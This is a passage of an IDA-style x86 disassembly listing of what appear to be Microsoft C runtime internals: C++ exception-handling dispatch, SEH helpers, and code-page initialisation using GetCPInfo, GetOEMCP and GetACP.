test byte ptr [eax+3], 80h
jz loc_41CA94
loc_41C966: ; CODE XREF: sub_41C92A+30�j
mov eax, [eax]
test eax, eax
js short loc_41C970
lea edi, [ecx+edi+0Ch]
loc_41C970: ; CODE XREF: sub_41C92A+40�j
and [ebp+ms_exc.disabled], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_41C9B2
call sub_42069D
pop ecx
pop ecx
test eax, eax
jz loc_41CA8B
push 1
push edi
call sub_4206B9
pop ecx
pop ecx
test eax, eax
jz loc_41CA8B
mov eax, [ebx+18h]
mov [edi], eax
loc_41C9A3: ; CODE XREF: sub_41C92A+D1�j
lea ecx, [esi+8]
call sub_41C766
mov [edi], eax
jmp loc_41CA90
; ---------------------------------------------------------------------------
loc_41C9B2: ; CODE XREF: sub_41C92A+51�j
test byte ptr [esi], 1
jz short loc_41C9FD
call sub_42069D
pop ecx
pop ecx
test eax, eax
jz loc_41CA8B
push 1
push edi
call sub_4206B9
pop ecx
pop ecx
test eax, eax
jz loc_41CA8B
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41EFF0
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41CA90
mov eax, [edi]
test eax, eax
jz loc_41CA90
jmp short loc_41C9A3
; ---------------------------------------------------------------------------
loc_41C9FD: ; CODE XREF: sub_41C92A+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_41CA36
call sub_42069D
pop ecx
pop ecx
test eax, eax
jz short loc_41CA8B
push 1
push edi
call sub_4206B9
pop ecx
pop ecx
test eax, eax
jz short loc_41CA8B
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_41C766
push eax
push edi
call sub_41EFF0
add esp, 0Ch
jmp short loc_41CA90
; ---------------------------------------------------------------------------
loc_41CA36: ; CODE XREF: sub_41C92A+D7�j
call sub_42069D
pop ecx
pop ecx
test eax, eax
jz short loc_41CA8B
push 1
push edi
call sub_4206B9
pop ecx
pop ecx
test eax, eax
jz short loc_41CA8B
push dword ptr [esi+18h]
call sub_4206D5
pop ecx
test eax, eax
jz short loc_41CA8B
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_41CA7A
push 1
call sub_41C766
push eax
push dword ptr [esi+18h]
push edi
call sub_4179BA
jmp short loc_41CA90
; ---------------------------------------------------------------------------
loc_41CA7A: ; CODE XREF: sub_41C92A+13B�j
call sub_41C766
push eax
push dword ptr [esi+18h]
push edi
call sub_4179BA
jmp short loc_41CA90
; ---------------------------------------------------------------------------
loc_41CA8B: ; CODE XREF: sub_41C92A+5C�j
; sub_41C92A+6E�j ...
call sub_41CE86
loc_41CA90: ; CODE XREF: sub_41C92A+83�j
; sub_41C92A+C1�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41CA94: ; CODE XREF: sub_41C92A+1B�j
; sub_41C92A+25�j ...
call __SEH_epilog
retn
sub_41C92A endp
; =============== S U B R O U T I N E =======================================
sub_41CA9A proc near ; DATA XREF: .text:stru_42C5E0�o
xor eax, eax
inc eax
retn
sub_41CA9A endp
; ---------------------------------------------------------------------------
loc_41CA9E: ; DATA XREF: .text:stru_42C5E0�o
mov esp, [ebp-18h]
jmp sub_41CE51
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAA6 proc near ; CODE XREF: sub_41CB0D+A2�p
; sub_41CBCD+17D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_41CABA
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_41C92A
pop ecx
pop ecx
loc_41CABA: ; CODE XREF: sub_41CAA6+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_41CAC6
push esi
jmp short loc_41CAC9
; ---------------------------------------------------------------------------
loc_41CAC6: ; CODE XREF: sub_41CAA6+1B�j
push [ebp+arg_14]
loc_41CAC9: ; CODE XREF: sub_41CAA6+1E�j
call sub_4179C1
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_41C653
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_41C783
add esp, 28h
test eax, eax
jz short loc_41CB0B
push esi
push eax
call sub_41798A
loc_41CB0B: ; CODE XREF: sub_41CAA6+5C�j
pop ebp
retn
sub_41CAA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB0D proc near ; CODE XREF: sub_41CBCD+1D3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_41CBCA
call sub_41915F
cmp dword ptr [eax+74h], 0
jz short loc_41CB4C
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_417C3E
add esp, 1Ch
test eax, eax
jnz short loc_41CBCA
loc_41CB4C: ; CODE XREF: sub_41CB0D+1E�j
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_417ADE
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_41CBC9
push ebx
loc_41CB72: ; CODE XREF: sub_41CB0D+B9�j
cmp esi, [edi]
jl short loc_41CBBA
cmp esi, [edi+4]
jg short loc_41CBBA
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41CB93
cmp byte ptr [ecx+8], 0
jnz short loc_41CBBA
loc_41CB93: ; CODE XREF: sub_41CB0D+7E�j
mov esi, [ebp+arg_4]
push 1
push [ebp+arg_1C]
lea ebx, [eax-10h]
push [ebp+arg_18]
xor ecx, ecx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41CAA6
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_41CBBA: ; CODE XREF: sub_41CB0D+67�j
; sub_41CB0D+6C�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_41CB72
pop ebx
loc_41CBC9: ; CODE XREF: sub_41CB0D+62�j
pop edi
loc_41CBCA: ; CODE XREF: sub_41CB0D+F�j
; sub_41CB0D+3D�j
pop esi
leave
retn
sub_41CB0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CBCD proc near ; CODE XREF: sub_41CDAF+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
and byte ptr [ebp+var_1C], 0
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jl short loc_41CBED
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41CBF2
loc_41CBED: ; CODE XREF: sub_41CBCD+16�j
call sub_41CE86
loc_41CBF2: ; CODE XREF: sub_41CBCD+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_41CD84
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz short loc_41CC7E
cmp [ebx+14h], edi
jnz short loc_41CC7E
cmp dword ptr [ebx+1Ch], 0
jnz short loc_41CC7E
call sub_41915F
cmp dword ptr [eax+78h], 0
jz loc_41CD7C
call sub_41915F
mov esi, [eax+78h]
mov [ebp+arg_0], esi
call sub_41915F
mov eax, [eax+7Ch]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_1C], 1
call sub_42069D
test eax, eax
pop ecx
pop ecx
jnz short loc_41CC56
call sub_41CE86
loc_41CC56: ; CODE XREF: sub_41CBCD+82�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_41CD81
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_41CC7B
cmp [eax+14h], edi
jnz short loc_41CC7B
cmp dword ptr [eax+1Ch], 0
jnz short loc_41CC7B
call sub_41CE86
loc_41CC7B: ; CODE XREF: sub_41CBCD+9C�j
; sub_41CBCD+A1�j ...
mov ebx, [ebp+arg_0]
loc_41CC7E: ; CODE XREF: sub_41CBCD+40�j
; sub_41CBCD+45�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_41CD84
cmp dword ptr [ebx+10h], 3
jnz loc_41CD84
cmp [ebx+14h], edi
jnz loc_41CD84
mov esi, [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_417ADE
mov ecx, [ebp+var_8]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jnb loc_41CD6C
jmp short loc_41CCCB
; ---------------------------------------------------------------------------
loc_41CCC8: ; CODE XREF: sub_41CBCD+199�j
mov esi, [ebp+var_18]
loc_41CCCB: ; CODE XREF: sub_41CBCD+F9�j
cmp [eax], esi
jg loc_41CD57
cmp esi, [eax+4]
jg short loc_41CD57
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_14], ecx
jle short loc_41CD57
loc_41CCE5: ; CODE XREF: sub_41CBCD+15B�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_C], edx
mov [ebp+var_10], ecx
jle short loc_41CD1E
loc_41CCFA: ; CODE XREF: sub_41CBCD+14C�j
mov eax, [ebp+var_C]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_41C5E6
test eax, eax
pop ecx
jnz short loc_41CD2C
dec [ebp+var_10]
add [ebp+var_C], 4
cmp [ebp+var_10], eax
jg short loc_41CCFA
mov eax, [ebp+var_4]
loc_41CD1E: ; CODE XREF: sub_41CBCD+12B�j
dec [ebp+var_14]
add esi, 10h
cmp [ebp+var_14], 0
jg short loc_41CCE5
jmp short loc_41CD57
; ---------------------------------------------------------------------------
loc_41CD2C: ; CODE XREF: sub_41CBCD+140�j
push [ebp+var_1C]
mov edi, [ebp+var_4]
push [ebp+arg_1C]
mov ecx, [ebp+var_24]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_41CAA6
mov ebx, [ebp+arg_0]
add esp, 1Ch
mov eax, edi
loc_41CD57: ; CODE XREF: sub_41CBCD+100�j
; sub_41CBCD+109�j ...
inc [ebp+var_8]
mov ecx, [ebp+var_8]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jb loc_41CCC8
loc_41CD6C: ; CODE XREF: sub_41CBCD+F3�j
cmp [ebp+arg_14], 0
jz short loc_41CD7C
push 1
push ebx
call sub_41C721
pop ecx
pop ecx
loc_41CD7C: ; CODE XREF: sub_41CBCD+56�j
; sub_41CBCD+1A3�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41CD81: ; CODE XREF: sub_41CBCD+8F�j
mov ebx, [ebp+arg_0]
loc_41CD84: ; CODE XREF: sub_41CBCD+31�j
; sub_41CBCD+B7�j ...
cmp [ebp+arg_14], 0
jnz short loc_41CDAA
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41CB0D
add esp, 20h
jmp short loc_41CD7C
; ---------------------------------------------------------------------------
loc_41CDAA: ; CODE XREF: sub_41CBCD+1BB�j
jmp sub_41CE51
sub_41CBCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CDAF proc near ; CODE XREF: .text:00417A34�p
; .text:00417A64�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_41CDCC
call sub_41CE86
loc_41CDCC: ; CODE XREF: sub_41CDAF+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41CDF4
cmp dword ptr [esi+4], 0
jz short loc_41CE4A
cmp [ebp+arg_14], 0
jnz short loc_41CE4A
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41C653
add esp, 10h
jmp short loc_41CE4A
; ---------------------------------------------------------------------------
loc_41CDF4: ; CODE XREF: sub_41CDAF+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41CE4A
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41CE2E
cmp [eax+14h], edi
jbe short loc_41CE2E
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41CE2E
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41CE4D
; ---------------------------------------------------------------------------
loc_41CE2E: ; CODE XREF: sub_41CDAF+51�j
; sub_41CDAF+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41CBCD
add esp, 20h
loc_41CE4A: ; CODE XREF: sub_41CDAF+2A�j
; sub_41CDAF+30�j ...
xor eax, eax
inc eax
loc_41CE4D: ; CODE XREF: sub_41CDAF+7D�j
pop edi
pop esi
pop ebp
retn
sub_41CDAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE51 proc near ; CODE XREF: sub_41C635+19�j
; .text:0041C761�j ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004206ED SIZE 00000018 BYTES
push 8
push offset stru_42C5F0
call __SEH_prolog
call sub_41915F
cmp dword ptr [eax+6Ch], 0
jz short loc_41CE81
and [ebp+ms_exc.disabled], 0
call sub_41915F
call dword ptr [eax+6Ch]
jmp short loc_41CE7D
; ---------------------------------------------------------------------------
loc_41CE76: ; DATA XREF: .text:stru_42C5F0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41CE7A: ; DATA XREF: .text:stru_42C5F0�o
mov esp, [ebp+ms_exc.old_esp]
loc_41CE7D: ; CODE XREF: sub_41CE51+23�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41CE81: ; CODE XREF: sub_41CE51+15�j
jmp loc_4206ED
sub_41CE51 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE86 proc near ; CODE XREF: sub_417ADE+23�p
; sub_417ADE:loc_417B48�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_42C600
call __SEH_prolog
mov eax, off_432A50
test eax, eax
jz short loc_41CEAE
and [ebp+ms_exc.disabled], 0
call eax ; sub_41CE51
jmp short loc_41CEAA
; ---------------------------------------------------------------------------
loc_41CEA3: ; DATA XREF: .text:stru_42C600�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41CEA7: ; DATA XREF: .text:stru_42C600�o
mov esp, [ebp+ms_exc.old_esp]
loc_41CEAA: ; CODE XREF: sub_41CE86+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41CEAE: ; CODE XREF: sub_41CE86+13�j
jmp sub_41CE51
sub_41CE86 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEC0 proc near ; CODE XREF: sub_417BED+3D�p
; sub_41C653+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_417DBD
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41CEFF
mov ecx, 2
loc_41CEFF: ; CODE XREF: sub_41CEC0+38�j
push ecx
call sub_417DBD
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41CEC0 endp
; =============== S U B R O U T I N E =======================================
sub_41CF0C proc near ; CODE XREF: sub_41D165+FF�p
; sub_41D165+149�p
sub eax, 3A4h
jz short loc_41CF35
sub eax, 4
jz short loc_41CF2F
sub eax, 0Dh
jz short loc_41CF29
dec eax
jz short loc_41CF23
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41CF23: ; CODE XREF: sub_41CF0C+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41CF29: ; CODE XREF: sub_41CF0C+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41CF2F: ; CODE XREF: sub_41CF0C+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41CF35: ; CODE XREF: sub_41CF0C+5�j
mov eax, 411h
retn
sub_41CF0C endp
; =============== S U B R O U T I N E =======================================
sub_41CF3B proc near ; CODE XREF: sub_41D165:loc_41D2DA�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_481700
rep stosd
stosb
xor eax, eax
mov dword_481804, eax
mov dword_4816E8, eax
mov dword_4816E0, eax
mov edi, offset word_481810
stosd
stosd
stosd
pop edi
retn
sub_41CF3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF64 proc near ; CODE XREF: sub_41D165:loc_41D2DF�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_432A48
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_18]
push eax
push dword_481804
call dword_4221B4 ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_41D0A4
xor eax, eax
loc_41CF99: ; CODE XREF: sub_41CF64+3F�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_41CF99
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_41CFE9
push ebx
lea edx, [ebp+var_11]
push edi
loc_41CFB8: ; CODE XREF: sub_41CF64+81�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41CFDF
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41CFDF: ; CODE XREF: sub_41CF64+5C�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_41CFB8
pop edi
pop ebx
loc_41CFE9: ; CODE XREF: sub_41CF64+4D�j
push 0
push dword_4816E0
lea eax, [ebp+var_518]
push dword_481804
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_41E8E0
push 0
push dword_481804
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push dword_4816E0
call sub_41C139
push 0
push dword_481804
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push dword_4816E0
call sub_41C139
add esp, 5Ch
xor eax, eax
loc_41D05E: ; CODE XREF: sub_41CF64+13C�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_41D081
or byte_481701[eax], 10h
mov cl, [ebp+eax+var_218]
loc_41D079: ; CODE XREF: sub_41CF64+130�j
mov byte_481820[eax], cl
jmp short loc_41D09D
; ---------------------------------------------------------------------------
loc_41D081: ; CODE XREF: sub_41CF64+105�j
test cl, 2
jz short loc_41D096
or byte_481701[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_41D079
; ---------------------------------------------------------------------------
loc_41D096: ; CODE XREF: sub_41CF64+120�j
and byte_481820[eax], 0
loc_41D09D: ; CODE XREF: sub_41CF64+11B�j
inc eax
cmp eax, esi
jb short loc_41D05E
jmp short loc_41D0E8
; ---------------------------------------------------------------------------
loc_41D0A4: ; CODE XREF: sub_41CF64+2D�j
xor eax, eax
loc_41D0A6: ; CODE XREF: sub_41CF64+182�j
cmp eax, 41h
jb short loc_41D0C4
cmp eax, 5Ah
ja short loc_41D0C4
or byte_481701[eax], 10h
mov cl, al
add cl, 20h
loc_41D0BC: ; CODE XREF: sub_41CF64+176�j
mov byte_481820[eax], cl
jmp short loc_41D0E3
; ---------------------------------------------------------------------------
loc_41D0C4: ; CODE XREF: sub_41CF64+145�j
; sub_41CF64+14A�j
cmp eax, 61h
jb short loc_41D0DC
cmp eax, 7Ah
ja short loc_41D0DC
or byte_481701[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41D0BC
; ---------------------------------------------------------------------------
loc_41D0DC: ; CODE XREF: sub_41CF64+163�j
; sub_41CF64+168�j
and byte_481820[eax], 0
loc_41D0E3: ; CODE XREF: sub_41CF64+15E�j
inc eax
cmp eax, esi
jb short loc_41D0A6
loc_41D0E8: ; CODE XREF: sub_41CF64+13E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_41C526
leave
retn
sub_41CF64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D0F6 proc near ; CODE XREF: sub_41D469+1A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_42C610
call __SEH_prolog
push 0Dh
call sub_41A166
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_41915F
mov edi, eax
mov [ebp+var_1C], edi
mov esi, [edi+60h]
mov [ebp+var_20], esi
cmp esi, dword_4816E4
jz short loc_41D148
test esi, esi
jz short loc_41D135
dec dword ptr [esi]
jnz short loc_41D135
push esi
call sub_416C97
pop ecx
loc_41D135: ; CODE XREF: sub_41D0F6+32�j
; sub_41D0F6+36�j
mov eax, dword_4816E4
mov [edi+60h], eax
mov esi, dword_4816E4
mov [ebp+var_20], esi
inc dword ptr [esi]
loc_41D148: ; CODE XREF: sub_41D0F6+2E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D15C
mov eax, esi
call __SEH_epilog
retn
sub_41D0F6 endp
; =============== S U B R O U T I N E =======================================
sub_41D159 proc near ; DATA XREF: .text:stru_42C610�o
mov esi, [ebp-20h]
sub_41D159 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41D15C proc near ; CODE XREF: sub_41D0F6+56�p
push 0Dh
call sub_41A0D2
pop ecx
retn
sub_41D15C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D165 proc near ; CODE XREF: sub_41D2FB+9F�p
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_4], eax
push edi
jz loc_41D2DA
xor edx, edx
xor eax, eax
loc_41D18A: ; CODE XREF: sub_41D165+36�j
cmp dword_432A68[eax], esi
jz short loc_41D1F7
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_41D18A
lea eax, [ebp+var_1C]
push eax
push esi
call dword_4221B4 ; GetCPInfo
cmp eax, 1
jnz loc_41D2D2
push 40h
xor eax, eax
cmp [ebp+var_1C], 1
pop ecx
mov edi, offset byte_481700
rep stosd
stosb
mov dword_481804, esi
mov dword_4816E0, ebx
jbe loc_41D2C0
cmp [ebp+var_16], 0
jz loc_41D298
lea ecx, [ebp+var_15]
loc_41D1E1: ; CODE XREF: sub_41D165+12D�j
mov dl, [ecx]
test dl, dl
jz loc_41D298
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_41D288
; ---------------------------------------------------------------------------
loc_41D1F7: ; CODE XREF: sub_41D165+2B�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_481700
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_8], ebx
stosb
lea ebx, dword_432A78[ecx]
loc_41D213: ; CODE XREF: sub_41D165+EB�j
mov al, [ebx]
mov esi, ebx
jmp short loc_41D242
; ---------------------------------------------------------------------------
loc_41D219: ; CODE XREF: sub_41D165+DF�j
mov dl, [esi+1]
test dl, dl
jz short loc_41D246
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_41D23E
mov edx, [ebp+var_8]
mov dl, byte_432A60[edx]
loc_41D233: ; CODE XREF: sub_41D165+D7�j
or byte_481701[eax], dl
inc eax
cmp eax, edi
jbe short loc_41D233
loc_41D23E: ; CODE XREF: sub_41D165+C3�j
inc esi
inc esi
mov al, [esi]
loc_41D242: ; CODE XREF: sub_41D165+B2�j
test al, al
jnz short loc_41D219
loc_41D246: ; CODE XREF: sub_41D165+B9�j
inc [ebp+var_8]
add ebx, 8
cmp [ebp+var_8], 4
jb short loc_41D213
mov eax, [ebp+arg_0]
mov dword_481804, eax
mov dword_4816E8, 1
call sub_41CF0C
lea ecx, dword_432A6C[ecx]
mov esi, ecx
mov edi, offset word_481810
movsd
movsd
mov dword_4816E0, eax
movsd
jmp short loc_41D2DF
; ---------------------------------------------------------------------------
loc_41D280: ; CODE XREF: sub_41D165+125�j
or byte_481701[eax], 4
inc eax
loc_41D288: ; CODE XREF: sub_41D165+8D�j
cmp eax, edx
jbe short loc_41D280
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41D1E1
loc_41D298: ; CODE XREF: sub_41D165+73�j
; sub_41D165+80�j
xor ecx, ecx
inc ecx
mov eax, ecx
loc_41D29D: ; CODE XREF: sub_41D165+145�j
or byte_481701[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41D29D
mov eax, esi
call sub_41CF0C
mov dword_4816E0, eax
mov dword_4816E8, ecx
jmp short loc_41D2C6
; ---------------------------------------------------------------------------
loc_41D2C0: ; CODE XREF: sub_41D165+69�j
mov dword_4816E8, ebx
loc_41D2C6: ; CODE XREF: sub_41D165+159�j
xor eax, eax
mov edi, offset word_481810
stosd
stosd
stosd
jmp short loc_41D2DF
; ---------------------------------------------------------------------------
loc_41D2D2: ; CODE XREF: sub_41D165+46�j
cmp dword_481328, ebx
jz short loc_41D2E8
loc_41D2DA: ; CODE XREF: sub_41D165+1B�j
call sub_41CF3B
loc_41D2DF: ; CODE XREF: sub_41D165+119�j
; sub_41D165+16B�j
call sub_41CF64
xor eax, eax
jmp short loc_41D2EB
; ---------------------------------------------------------------------------
loc_41D2E8: ; CODE XREF: sub_41D165+173�j
or eax, 0FFFFFFFFh
loc_41D2EB: ; CODE XREF: sub_41D165+181�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41C526
leave
retn
sub_41D165 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D2FB proc near ; CODE XREF: sub_41D44B+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 14h
push offset stru_42C620
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
push 0Dh
call sub_41A166
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov dword_481328, edi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_41D338
mov dword_481328, 1
call dword_4221B0 ; GetOEMCP
jmp short loc_41D363
; ---------------------------------------------------------------------------
loc_41D338: ; CODE XREF: sub_41D2FB+29�j
cmp eax, 0FFFFFFFDh
jnz short loc_41D34F
mov dword_481328, 1
call dword_4221AC ; GetACP
jmp short loc_41D363
; ---------------------------------------------------------------------------
